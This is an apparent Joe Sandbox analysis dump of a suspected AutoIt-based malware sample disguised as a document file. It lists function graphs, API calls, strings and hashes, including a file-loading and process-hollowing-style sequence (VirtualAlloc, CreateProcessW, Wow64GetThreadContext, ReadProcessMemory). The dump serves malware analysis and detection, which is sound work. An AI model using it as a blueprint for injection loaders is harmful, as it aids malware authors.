                                                        control_flow_graph 1494 713dcb-713df1 call 713f9b 1497 7839f9-783a09 call 75cc82 1494->1497 1498 713df7-713e04 call 713f9b 1494->1498 1502 783a0e-783a10 1497->1502 1498->1497 1503 713e0a-713e10 1498->1503 1504 783a2f-783a77 call 73010a 1502->1504 1505 783a12-783a15 call 713e39 1502->1505 1507 783a1a-783a29 call 75757b 1503->1507 1508 713e16-713e36 call 71bdf0 1503->1508 1513 783a98 1504->1513 1514 783a79-783a96 call 72ac65 1504->1514 1505->1507 1507->1504 1518 783a9a-783aad 1513->1518 1514->1518 1520 783ab3 1518->1520 1521 783c24-783c35 call 7328ca call 713e39 1518->1521 1523 783aba-783abd call 753460 1520->1523 1530 783c37-783c47 call 715800 call 75a46f 1521->1530 1527 783ac2-783ae4 call 71b7ff call 75a5be 1523->1527 1536 783af8-783b02 call 75a5a8 1527->1536 1537 783ae6-783af3 1527->1537 1547 783c4c-783c7c call 7532b0 call 73017e call 7328ca call 713e39 1530->1547 1545 783b1c-783b26 call 75a592 1536->1545 1546 783b04-783b17 1536->1546 1539 783beb-783bfb call 71b6d0 1537->1539 1539->1527 1549 783c01-783c0b call 71a870 1539->1549 1556 783b28-783b35 1545->1556 1557 783b3a-783b44 call 72df5b 1545->1557 1546->1539 1547->1530 1555 783c10-783c1e 1549->1555 1555->1521 1555->1523 1556->1539 1557->1539 1563 783b4a-783b62 call 7530ac 1557->1563 1568 783b64-783b83 call 71caee call 715cd3 1563->1568 1569 783b85-783b88 1563->1569 1592 783ba6-783bb4 call 71b7ff 1568->1592 1571 783b8a-783ba5 call 71caee call 7534b4 call 715cd3 1569->1571 1572 783bb6-783bb9 1569->1572 1571->1592 1574 783bd9-783bdc call 75a525 1572->1574 1575 783bbb-783bc4 call 752fcd 1572->1575 1582 783be1-783bea call 73017e 1574->1582 1575->1547 1585 783bca-783bd4 call 73017e 1575->1585 1582->1539 1585->1527 1592->1582
                                                        APIs
                                                          • Part of subcall function 00713F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007134E2,?,00000001), ref: 00713FCD
                                                        • _free.LIBCMT ref: 00783C27
                                                        • _free.LIBCMT ref: 00783C6E
                                                          • Part of subcall function 0071BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,007D22E8,?,00000000,?,00713E2E,?,00000000,?,007ADBF0,00000000,?), ref: 0071BE8B
                                                          • Part of subcall function 0071BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00713E2E,?,00000000,?,007ADBF0,00000000,?,00000002), ref: 0071BEA7
                                                          • Part of subcall function 0071BDF0: __wsplitpath.LIBCMT ref: 0071BF19
                                                          • Part of subcall function 0071BDF0: _wcscpy.LIBCMT ref: 0071BF31
                                                          • Part of subcall function 0071BDF0: _wcscat.LIBCMT ref: 0071BF46
                                                          • Part of subcall function 0071BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0071BF56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<q$G-q
                                                        • API String ID: 1510338132-2170838863
                                                        • Opcode ID: 2d53f84cd4d80f501c36eaa6b71a272675ed14a269e4bb71a7759f58d277c188
                                                        • Instruction ID: 94e1f00868466605f4482a50945da95132d29f6e7d2ff6457f77388de65958ee
                                                        • Opcode Fuzzy Hash: 2d53f84cd4d80f501c36eaa6b71a272675ed14a269e4bb71a7759f58d277c188
                                                        • Instruction Fuzzy Hash: 01917371940219EFCF04EFA8CC559EEB7B4BF09710F104529F816AB291DB789E45CB60
                                                        Function 04D72600 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1597 4d72600-4d726ae call 4d70000 1600 4d726b5-4d726db call 4d73510 CreateFileW 1597->1600 1603 4d726e2-4d726f2 1600->1603 1604 4d726dd 1600->1604 1609 4d726f4 1603->1609 1610 4d726f9-4d72713 VirtualAlloc 1603->1610 1605 4d7282d-4d72831 1604->1605 1607 4d72873-4d72876 1605->1607 1608 4d72833-4d72837 1605->1608 1611 4d72879-4d72880 1607->1611 1612 4d72843-4d72847 1608->1612 1613 4d72839-4d7283c 1608->1613 1609->1605 1614 4d72715 1610->1614 1615 4d7271a-4d72731 ReadFile 1610->1615 1616 4d728d5-4d728ea 1611->1616 1617 4d72882-4d7288d 1611->1617 1618 4d72857-4d7285b 1612->1618 1619 4d72849-4d72853 1612->1619 1613->1612 1614->1605 1624 4d72733 1615->1624 1625 4d72738-4d72778 VirtualAlloc 1615->1625 1620 4d728ec-4d728f7 VirtualFree 1616->1620 1621 4d728fa-4d72902 1616->1621 1626 4d72891-4d7289d 1617->1626 1627 4d7288f 1617->1627 1622 4d7285d-4d72867 1618->1622 1623 4d7286b 1618->1623 1619->1618 1620->1621 1622->1623 1623->1607 1624->1605 1628 4d7277f-4d7279a call 4d73760 1625->1628 1629 4d7277a 1625->1629 1630 4d728b1-4d728bd 1626->1630 1631 4d7289f-4d728af 1626->1631 1627->1616 1637 4d727a5-4d727af 1628->1637 1629->1605 1634 4d728bf-4d728c8 1630->1634 1635 4d728ca-4d728d0 1630->1635 1633 4d728d3 1631->1633 1633->1611 1634->1633 1635->1633 1638 4d727e2-4d727f6 call 4d73570 1637->1638 1639 4d727b1-4d727e0 call 4d73760 1637->1639 1645 4d727fa-4d727fe 1638->1645 1646 4d727f8 1638->1646 1639->1637 1647 4d72800-4d72804 CloseHandle 1645->1647 1648 4d7280a-4d7280e 1645->1648 1646->1605 1647->1648 1649 4d72810-4d7281b VirtualFree 1648->1649 1650 4d7281e-4d72827 1648->1650 1649->1650 1650->1600 1650->1605
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04D726D1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04D728F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction ID: 75e12ae16508495e09ec1b9cde01578f786ba9215502017027d12b0c110788b2
                                                        • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction Fuzzy Hash: 92A10D74E00249EBDB14CFA4C994BEEB7B5FF48304F208599E501BB280E779AA41DF55
                                                        Function 0072EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1706 72eb05-72eb2f call 71c4cd RegOpenKeyExW 1709 72eb35-72eb39 1706->1709 1710 784b17-784b2e RegQueryValueExW 1706->1710 1711 784b30-784b6d call 73010a call 714bce RegQueryValueExW 1710->1711 1712 784b91-784b9a RegCloseKey 1710->1712 1717 784b88-784b90 call 714fd2 1711->1717 1718 784b6f-784b86 call 717e53 1711->1718 1717->1712 1718->1717
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0072EADA,?,?), ref: 0072EB27
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0072EADA,?,?), ref: 00784B26
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0072EADA,?,?), ref: 00784B65
                                                        • RegCloseKey.ADVAPI32(?,?,0072EADA,?,?), ref: 00784B94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$CloseOpen
                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                        • API String ID: 1586453840-614718249
                                                        • Opcode ID: e3a5c3afb200d4c0e94c36ec6a761369a6caade82ee0888e0cc76fff6dfc1ed2
                                                        • Instruction ID: 4e0789d781564043cfc67d68f4b9c97ba8a4de2e161b1c61358f80a1c5f1b6b1
                                                        • Opcode Fuzzy Hash: e3a5c3afb200d4c0e94c36ec6a761369a6caade82ee0888e0cc76fff6dfc1ed2
                                                        • Instruction Fuzzy Hash: 3C1184B1640108FEEB14EBA8CD8AEFE7BBCEF04354F504055F506D2190EAB49E46D760
                                                        Function 00712E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00712ECB
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00712EEC
                                                        • ShowWindow.USER32(00000000), ref: 00712F00
                                                        • ShowWindow.USER32(00000000), ref: 00712F09
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 5a5bf0a6d97ebae38c3edac5e06898715a2e7ff913da328972b7fc010750714c
                                                        • Instruction ID: 21acc66ed30d0eaba126f956c345ea118730562cdb2e94c0a505d5be9c2e9425
                                                        • Opcode Fuzzy Hash: 5a5bf0a6d97ebae38c3edac5e06898715a2e7ff913da328972b7fc010750714c
                                                        • Instruction Fuzzy Hash: 1EF03A70A412D47AE7306767AC08E672F7DD7C7F20F41C11FBA08A21B0C1690C81CAB4
                                                        Function 04D723B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 04D722A0: Sleep.KERNEL32(000001F4), ref: 04D722B1
                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04D724EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: KSYQLPIIZC1YEZ6TCW6FEQAX1SUN
                                                        • API String ID: 2694422964-4263944113
                                                        • Opcode ID: bca3a1b0a92a29403694052cec8b2228bbeb688bf58aaf2cc35a834f93522215
                                                        • Instruction ID: 088aaa54a1ea2073520c2d4bf7ce197f5b417c7a61d4df20345a3af56286344c
                                                        • Opcode Fuzzy Hash: bca3a1b0a92a29403694052cec8b2228bbeb688bf58aaf2cc35a834f93522215
                                                        • Instruction Fuzzy Hash: C3616330D04288DAEF11DBB4C858BDFBB74AF19304F044198E6497B2C1E6B95B49CBA5
                                                        Function 007138E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078454E
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • _memset.LIBCMT ref: 00713965
                                                        • _wcscpy.LIBCMT ref: 007139B5
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007139C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 4d2cfbb444d58a8214114a747c0529ecef85c9b51888bea5e8f95239f3687bce
                                                        • Instruction ID: 231d3b5d9bf558336faf708e12232bc30fa0c324078942e1629e8456d58a9ca9
                                                        • Opcode Fuzzy Hash: 4d2cfbb444d58a8214114a747c0529ecef85c9b51888bea5e8f95239f3687bce
                                                        • Instruction Fuzzy Hash: CE31C471009340EBD321EB64DC49FDA77F8AB44354F40851BF584920E1DBBCAA88CB96
                                                        Function 0074A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CLSIDFromProgID.COMBASE ref: 0074A874
                                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0074A88F
                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 0074A89D
                                                        • CoTaskMemFree.COMBASE(00000000), ref: 0074A8AD
                                                        • CLSIDFromString.COMBASE(?,?), ref: 0074A8B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: ff50c921e63452eeb6b5bf5cc1eb4e732f9b1cf8b9ef0e11277954c7ee37aa1e
                                                        • Instruction ID: 04e904c36f9c9758f2c681927fad16a9f694c90b2bdbe0caf01d594e92f89df2
                                                        • Opcode Fuzzy Hash: ff50c921e63452eeb6b5bf5cc1eb4e732f9b1cf8b9ef0e11277954c7ee37aa1e
                                                        • Instruction Fuzzy Hash: EC018F76601204BFDB224F54DC44BAA7BFDEF44361F108025B901D2210D778DD429BA1
                                                        Function 0076F79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dE|
                                                        • API String ID: 0-1679965369
                                                        • Opcode ID: 8e8d2ed35e744965c5f2b3ac39a76137f9eb7e8a20403137d7a051c741acb4c9
                                                        • Instruction ID: 7caec784307535b76572514f28bb85ea2a291dbd22176b130f92cbcc9f6c7b3c
                                                        • Opcode Fuzzy Hash: 8e8d2ed35e744965c5f2b3ac39a76137f9eb7e8a20403137d7a051c741acb4c9
                                                        • Instruction Fuzzy Hash: 2EF17A71608701DFC710DF28D885B5AB7E1FF88314F14892EF99A9B292D778E945CB82
                                                        Function 00713A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetMalloc.SHELL32(1<q), ref: 00713A7D
                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00713AD2
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00713A8F
                                                          • Part of subcall function 00713B1E: _wcsncpy.LIBCMT ref: 00713B32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                        • String ID: 1<q
                                                        • API String ID: 3981382179-2384031456
                                                        • Opcode ID: d27708dda55e0887d3690afc4ca342b4c9ec8fa32d18798b1d836f79455a8b19
                                                        • Instruction ID: ef207dbc80a8d06e56148c66a020e7517795d6fde01639c86f9ee60b30581954
                                                        • Opcode Fuzzy Hash: d27708dda55e0887d3690afc4ca342b4c9ec8fa32d18798b1d836f79455a8b19
                                                        • Instruction Fuzzy Hash: 34218776B00114ABCB24DF99DC88DEE77BEEF88710B108095F509DB291EB749E46CB94
                                                        Function 0072C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0072C948,SwapMouseButtons,00000004,?), ref: 0072C979
                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0072C948,SwapMouseButtons,00000004,?,?,?,?,0072BF22), ref: 0072C99A
                                                        • RegCloseKey.KERNEL32(00000000,?,?,0072C948,SwapMouseButtons,00000004,?,?,?,?,0072BF22), ref: 0072C9BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: f44622898601264ac533d4b2d7df9c58c9ab2a5375847d550fb613e7a84b04c1
                                                        • Instruction ID: 93f5a15b1341a738d3a3fded780d9380533ecdf12456e0f50706a99a8ec3588a
                                                        • Opcode Fuzzy Hash: f44622898601264ac533d4b2d7df9c58c9ab2a5375847d550fb613e7a84b04c1
                                                        • Instruction Fuzzy Hash: C7117C75511218BFDB228F64EC44EAE77B8EF14740F00841AA981E7214E235AE919B64
                                                        Function 04D712A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 04D71A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04D71AF1
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 04D71B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction ID: 00ae8122b3328f43f8b6f7cad62def3bc65ed1cb28b5e7c2a0de74e006ce2c3a
                                                        • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction Fuzzy Hash: CE62E830A142589AEB24CFA4C851BDEB376FF58700F1091A9D10DEB394E779AE81CB59
                                                        Function 0074A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccc7551d3b704df90ff7f33e34cdb24f1802d8d1df745e7c85f3f8f1d4656def
                                                        • Instruction ID: 32f960df3bebea27a0c1ffa0a3af873cc1ec19ba2ce1114afb7c0fb218dda726
                                                        • Opcode Fuzzy Hash: ccc7551d3b704df90ff7f33e34cdb24f1802d8d1df745e7c85f3f8f1d4656def
                                                        • Instruction Fuzzy Hash: 84C16E75A4021AFFCB14CFA4C984EAEB7B5FF48710F108599E901AB251D738EE41DBA1
                                                        Function 0076AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0076AF56
                                                        • CoUninitialize.COMBASE ref: 0076AF61
                                                          • Part of subcall function 00751050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007510B8
                                                        • VariantInit.OLEAUT32(?), ref: 0076AF6C
                                                        • VariantClear.OLEAUT32(?), ref: 0076B23F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
